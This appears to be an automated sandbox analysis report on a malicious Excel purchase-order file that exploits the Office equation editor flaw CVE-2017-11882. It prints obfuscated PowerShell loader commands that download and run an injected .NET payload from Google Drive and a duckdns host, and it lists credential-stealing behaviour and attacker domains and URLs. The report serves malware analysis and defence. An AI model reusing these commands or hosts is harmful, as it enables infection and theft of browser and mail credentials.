                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbtag9nzvs0xsskufnob21fwzm0xssneccpicggkcgndnpnaw1hz2vvcmwgpsb3annodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vwhcwxd1cib3anm7dnpnd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt2emdpbwfnzuj5dgvzid0nkycgdnpnd2viq2xpzw50lkrvjysnd25sb2fkjysnrgf0ysh2emcnkydpbwfnzvvybck7dnpnascrj21hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcodnpnaw1hz2vcexrlcyk7dnpnc3rhcnrgbgfnid0gd2pzpdxcqvnfnjrfu1rbulq+pndqczt2emdlbicrj2rgbgfnid0gd2pzpdxcqvnfnjrfru5epj53anm7dnpnc3rhjysncnrjbicrj2rleca9ihz6z2ltywdlvgv4dc5jbmrlee9mkhz6z3n0yxj0rmxhzyk7dicrj3pnzw5ksw5kzxggjysnpsb2emdpbwfnzvrlehqusw5kzxhpzih2emdlbmrgjysnbgenkydnktt2emdzdgfydeluzgv4ic1nzsawic1hbmqgdnpnzw5ksw5kzxgglwd0ihz6z3n0yxj0sw5kzxg7dnpnc3rhcnrjbmrlecarpsankyd2emdzdgfydezsywcutgvuz3rooycrj3z6z2jhc2unkyc2nexlbmd0aca9ihz6z2vuzeluzgv4ic0gdicrj3pnc3rhcnrjbmrledt2emdiyxnlnjrdb21tyw5kid0gdnpnaw1hz2vuzxh0lln1ynn0cmluzyh2emdzdgenkydydeluzgv4lcb2emdiyxnlnjrmzw5njysndggpo3z6z2jhc2u2nfjldmvyc2vkid0glwpvaw4gkhz6z2jhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksa3tkygrm9yrwfjac1pymply3qgeyb2emdfih0pwy0xli4tkhz6z2jhc2u2nenvbw1hbmqutgvuz3rokv07dnpny29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh2emdiyxnlnjrszxzlcicrj3nlzck7dnpnbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhz6z2nvbw1hbmrcexrlcyk7dnpndmenkydptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzch3annwqul3anmpo3z6z3zhau1ldghvzc5jbnzva2uodnpnbnvsjysnbcwgqch3ann0ehqudhnldgfszglvcmrzc3nzc3nzb3rpdxfll2dyby5zbmrry3vklmvsawz5exl5exlhzhnlbmrldy8vonankyd0dgh3anmsihdqc2rlc2f0axzhzg93anmnkycsihdqc2rlc2f0axzhzg93anmsihdqc2rlc2f0axzhzg93anmnkycsihdqc0fkzeluuhjvy2vzczmyd2pzlcb3annkzxnhdgl2ywrvd2pzlcb3annkzxnhdgl2ywrvd2pzlhdqc2rlc2f0axzhzg93anmsd2pzzgvzyxrpdmfkb3dqcyx3annkzxnhdgl2ywrvd2pzlhdqc2rlc2f0axzhzg93anmsd2pzzgunkydzyxrpdmfkb3dqcyx3anmxd2pzlhdqc2rlc2f0axzhzg93anmpktsnks1dcmvwbgfjrshbq2hhul0xmtgrw0noyvjdmtiyk1tdagfsxtewmyksw0noyvjdmzygic1yzvbsqunlicaow0noyvjdnturw0noyvjdnzgrw0noyvjdnzaplftdagfsxteyncatcmvqbefdzsd3anmnlftdagfsxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[4]+$pshome[34]+'x') ( (('vzgimageurl = wjshttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur wjs;vzgwebclient = new-object system.net.webclient;vzgimagebytes ='+' vzgwebclient.do'+'wnload'+'data(vzg'+'imageurl);vzgi'+'magetext = [system.text.encoding]::utf8.getstring(vzgimagebytes);vzgstartflag = wjs<<base64_start>>wjs;vzgen'+'dflag = wjs<<base64_end>>wjs;vzgsta'+'rtin'+'dex = vzgimagetext.indexof(vzgstartflag);v'+'zgendindex '+'= vzgimagetext.indexof(vzgendf'+'la'+'g);vzgstartindex -ge 0 -and vzgendindex -gt vzgstartindex;vzgstartindex += '+'vzgstartflag.length;'+'vzgbase'+'64length = vzgendindex - v'+'zgstartindex;vzgbase64command = vzgimagetext.substring(vzgsta'+'rtindex, vzgbase64leng'+'th);vzgbase64reversed = -join (vzgbase64command.tochararray() 7nf foreach-object { vzg_ })[-1..-(vzgbase64command.length)];vzgcommandbytes = [system.convert]::frombase64string(vzgbase64rever'+'sed);vzgloadedassembly = [system.reflection.assembly]::load(vzgcommandbytes);vzgva'+'imethod = [dnlib.io.home].getmethod(wjsvaiwjs);vzgvaimethod.invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsaddinprocess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-creplace([char]118+[char]122+[char]103),[char]36 -replace ([char]55+[char]78+[char]70),[char]124 -replace'wjs',[char]39) )"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbtag9nzvs0xsskufnob21fwzm0xssneccpicggkcgndnpnaw1hz2vvcmwgpsb3annodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vwhcwxd1cib3anm7dnpnd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt2emdpbwfnzuj5dgvzid0nkycgdnpnd2viq2xpzw50lkrvjysnd25sb2fkjysnrgf0ysh2emcnkydpbwfnzvvybck7dnpnascrj21hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcodnpnaw1hz2vcexrlcyk7dnpnc3rhcnrgbgfnid0gd2pzpdxcqvnfnjrfu1rbulq+pndqczt2emdlbicrj2rgbgfnid0gd2pzpdxcqvnfnjrfru5epj53anm7dnpnc3rhjysncnrjbicrj2rleca9ihz6z2ltywdlvgv4dc5jbmrlee9mkhz6z3n0yxj0rmxhzyk7dicrj3pnzw5ksw5kzxggjysnpsb2emdpbwfnzvrlehqusw5kzxhpzih2emdlbmrgjysnbgenkydnktt2emdzdgfydeluzgv4ic1nzsawic1hbmqgdnpnzw5ksw5kzxgglwd0ihz6z3n0yxj0sw5kzxg7dnpnc3rhcnrjbmrlecarpsankyd2emdzdgfydezsywcutgvuz3rooycrj3z6z2jhc2unkyc2nexlbmd0aca9ihz6z2vuzeluzgv4ic0gdicrj3pnc3rhcnrjbmrledt2emdiyxnlnjrdb21tyw5kid0gdnpnaw1hz2vuzxh0lln1ynn0cmluzyh2emdzdgenkydydeluzgv4lcb2emdiyxnlnjrmzw5njysndggpo3z6z2jhc2u2nfjldmvyc2vkid0glwpvaw4gkhz6z2jhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksa3tkygrm9yrwfjac1pymply3qgeyb2emdfih0pwy0xli4tkhz6z2jhc2u2nenvbw1hbmqutgvuz3rokv07dnpny29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh2emdiyxnlnjrszxzlcicrj3nlzck7dnpnbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhz6z2nvbw1hbmrcexrlcyk7dnpndmenkydptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzch3annwqul3anmpo3z6z3zhau1ldghvzc5jbnzva2uodnpnbnvsjysnbcwgqch3ann0ehqudhnldgfszglvcmrzc3nzc3nzb3rpdxfll2dyby5zbmrry3vklmvsawz5exl5exlhzhnlbmrldy8vonankyd0dgh3anmsihdqc2rlc2f0axzhzg93anmnkycsihdqc2rlc2f0axzhzg93anmsihdqc2rlc2f0axzhzg93anmnkycsihdqc0fkzeluuhjvy2vzczmyd2pzlcb3annkzxnhdgl2ywrvd2pzlcb3annkzxnhdgl2ywrvd2pzlhdqc2rlc2f0axzhzg93anmsd2pzzgvzyxrpdmfkb3dqcyx3annkzxnhdgl2ywrvd2pzlhdqc2rlc2f0axzhzg93anmsd2pzzgunkydzyxrpdmfkb3dqcyx3anmxd2pzlhdqc2rlc2f0axzhzg93anmpktsnks1dcmvwbgfjrshbq2hhul0xmtgrw0noyvjdmtiyk1tdagfsxtewmyksw0noyvjdmzygic1yzvbsqunlicaow0noyvjdnturw0noyvjdnzgrw0noyvjdnzaplftdagfsxteyncatcmvqbefdzsd3anmnlftdagfsxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[4]+$pshome[34]+'x') ( (('vzgimageurl = wjshttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur wjs;vzgwebclient = new-object system.net.webclient;vzgimagebytes ='+' vzgwebclient.do'+'wnload'+'data(vzg'+'imageurl);vzgi'+'magetext = [system.text.encoding]::utf8.getstring(vzgimagebytes);vzgstartflag = wjs<<base64_start>>wjs;vzgen'+'dflag = wjs<<base64_end>>wjs;vzgsta'+'rtin'+'dex = vzgimagetext.indexof(vzgstartflag);v'+'zgendindex '+'= vzgimagetext.indexof(vzgendf'+'la'+'g);vzgstartindex -ge 0 -and vzgendindex -gt vzgstartindex;vzgstartindex += '+'vzgstartflag.length;'+'vzgbase'+'64length = vzgendindex - v'+'zgstartindex;vzgbase64command = vzgimagetext.substring(vzgsta'+'rtindex, vzgbase64leng'+'th);vzgbase64reversed = -join (vzgbase64command.tochararray() 7nf foreach-object { vzg_ })[-1..-(vzgbase64command.length)];vzgcommandbytes = [system.convert]::frombase64string(vzgbase64rever'+'sed);vzgloadedassembly = [system.reflection.assembly]::load(vzgcommandbytes);vzgva'+'imethod = [dnlib.io.home].getmethod(wjsvaiwjs);vzgvaimethod.invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsaddinprocess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-creplace([char]118+[char]122+[char]103),[char]36 -replace ([char]55+[char]78+[char]70),[char]124 -replace'wjs',[char]39) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3940, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.623977936.00000000023B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3940, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3940, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information211
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      211
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts43
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      311
                      Process Injection
                      11
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      23
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts121
                      Command and Scripting Interpreter
                      Logon Script (Windows)Logon Script (Windows)1
                      Obfuscated Files or Information
                      Security Account Manager421
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login HookLogin Hook1
                      Install Root Certificate
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets151
                      Virtualization/Sandbox Evasion
                      SSHKeylogging113
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry
                      DCSync1
                      Remote System Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540838 Sample: Orden de Compra No. 7898675... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 23 other signatures 2->59 10 EXCEL.EXE 6 9 2->10         started        process3 file4 33 ~$Orden de Compra ...565344657.xlam.xlsx, data 10->33 dropped 13 EQNEDT32.EXE 12 10->13         started        process5 dnsIp6 49 wednesdayyyyyyfile.duckdns.org 198.46.178.134, 49163, 49168, 80 AS-COLOCROSSINGUS United States 13->49 35 C:\Users\user\...\wednesdaydatinglover.vbs, Unicode 13->35 dropped 37 C:\...\wednesdaysMPDW-constraints[1].vbs, Unicode 13->37 dropped 91 Office equation editor establishes network connection 13->91 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->93 18 wscript.exe 1 13->18         started        file7 signatures8 process9 dnsIp10 39 paste.ee 18->39 41 paste.ee 188.114.96.3, 443, 49164, 49165 CLOUDFLARENETUS European Union 18->41 61 System process connects to network (likely due to code injection or exploit) 18->61 63 Suspicious powershell command line found 18->63 65 Wscript starts Powershell (via cmd or directly) 18->65 69 4 other signatures 18->69 22 powershell.exe 4 18->22         started        signatures11 67 Connects to a pastebin service (likely for C&C) 39->67 process12 signatures13 71 Suspicious powershell command line found 22->71 73 Obfuscated command line found 22->73 25 powershell.exe 12 5 22->25         started        process14 dnsIp15 43 wednesdayyyyyyfile.duckdns.org 25->43 45 drive.usercontent.google.com 142.250.186.97, 443, 49167 GOOGLEUS United States 25->45 47 drive.google.com 216.58.206.46, 443, 49166 GOOGLEUS United States 25->47 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->75 77 Writes to foreign memory regions 25->77 79 Injects a PE file into a foreign processes 25->79 29 AddInProcess32.exe 12 2 25->29         started        signatures16 81 Uses dynamic DNS services 43->81 process17 dnsIp18 51 ip-api.com 208.95.112.1, 49169, 80 TUT-ASUS United States 29->51 83 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 29->83 85 Tries to steal Mail credentials (via file / registry access) 29->85 87 Tries to harvest and steal browser information (history, passwords, etc) 29->87 89 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 29->89 signatures19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Orden de Compra No. 78986756565344657.xlam.xlsx71%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                      Orden de Compra No. 78986756565344657.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://crl.entrust.net/server1.crl00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://ip-api.com0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://secure.comodo.com/CPS00%URL Reputationsafe
                      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      wednesdayyyyyyfile.duckdns.org
                      198.46.178.134
                      truetrue
                        unknown
                        paste.ee
                        188.114.96.3
                        truetrue
                          unknown
                          drive.google.com
                          216.58.206.46
                          truefalse
                            unknown
                            drive.usercontent.google.com
                            142.250.186.97
                            truefalse
                              unknown
                              ip-api.com
                              208.95.112.1
                              truetrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://paste.ee/d/nwtkdtrue
                                  unknown
                                  http://wednesdayyyyyyfile.duckdns.org/equitosssssssdroidlatest.txttrue
                                    unknown
                                    http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbstrue
                                      unknown
                                      http://ip-api.com/line/?fields=hostingfalse
                                      • URL Reputation: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://account.dyn.com/powershell.exe, 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.entrust.net/server1.crl0wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://paste.ee/d/nwtkdE6wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://ocsp.entrust.net03wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbsjEQNEDT32.EXE, 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://paste.ee/d/nwtkwscript.exe, 00000006.00000003.477174452.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.477774934.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://contoso.com/Licensepowershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.google.com;wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/Iconpowershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
